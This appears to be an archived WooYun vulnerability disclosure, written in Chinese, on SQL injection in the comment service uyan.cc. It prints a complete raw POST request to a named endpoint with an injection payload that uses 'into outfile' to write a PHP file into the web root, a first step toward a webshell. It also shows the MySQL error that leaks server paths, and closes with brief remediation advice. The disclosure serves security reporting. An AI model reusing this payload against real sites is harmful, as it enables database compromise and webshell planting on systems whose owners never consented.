乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2011-10-21: 积极联系厂商并且等待厂商认领中,细节不对外公开 2011-10-21: 厂商已经主动忽略漏洞,细节向公众公开
http://uyan.cc是新成立的社区评论创业公司,其对sql过滤不严导致漏洞发生。
http://uyan.cc/index.php/youyan_content/getRepliesTogether/time 对post上来的数据未进行过滤。同时http://uyan.cc/index.php/youyan?title=%E5%9B%BD%E5%86%852%E4%BA%BA%E5%88%9B%E4%B8%泄露了文件路径。但由于数据库跟web分离,into outfile直接拿webshell难。
POST http://uyan.cc/index.php/youyan_content/getRepliesTogether/time HTTP/1.1Host: uyan.ccConnection: keep-aliveContent-Length: 723Origin: http://uyan.ccX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1Content-Type: application/x-www-form-urlencodedAccept: application/json, text/javascript, */*Referer: http://uyan.cc/index.php/youyan?pageId=www.36kr.com_www.36kr.com%2F%3Fp%3D54654&domain=www.36kr.coma'%20&&%20'1'='2&master_id=2711%20&&%201=2&title=''''''-1&url=-1&pageImg=;%3C/javascript%3E&pageContent=-1Accept-Encoding: gzip,deflate,sdchAccept-Language: en-US,en;q=0.8,zh-CN;q=0.6Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3Cookie: PHPSESSID=97ipt9bjm2otbd7j2cphg84444comment_ids%5B%5D=168019&comment_ids%5B%5D=168031 and (select '11111' into outfile '//opt//lampstack-5.3.6-0//apache2//htdocs//controllers//1ssbbb.php' )=1&comment_ids%5B%5D=168020&comment_ids%5B%5D=168032&comment_ids%5B%5D=168007&comment_ids%5B%5D=168006&comment_ids%5B%5D=167967&comment_ids%5B%5D=167985&comment_ids%5B%5D=167986&comment_ids%5B%5D=167987&page=www.36kr.com_www.36kr.com%2F%3Fp%3D54654&delStyle=0&reply_page_no%5B167967%5D=0&reply_page_no%5B167985%5D=0&reply_page_no%5B167986%5D=0&reply_page_no%5B167987%5D=0&reply_page_no%5B168006%5D=0&reply_page_no%5B168007%5D=0&reply_page_no%5B168019%5D=0&reply_page_no%5B168020%5D=0&reply_page_no%5B168031%5D=0&reply_page_no%5B168032%5D=0&session_name=uyan_www.36kr.com
<body> <div id="content"> <h1>A Database Error Occurred</h1> <p>Error Number: 1064</p><p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1=1 order by comment.time desc limit 0, 3' at line 3</p><p>select user.*, comment.* from comment LEFT JOIN user ON user.user_id = comment.user_id where comment.del=0 and comment.reply_to_comment_id=168031 and '1=1 order by comment.time desc limit 0, 3</p><p>Filename: /opt/lampstack-5.3.6-0/apache2/htdocs/models/comment_model.php</p><p>Line Number: 251</p> </div></body></html>
对用户提交参数进行过滤,同时屏蔽错误详细信息
未能联系到厂商或者厂商积极拒绝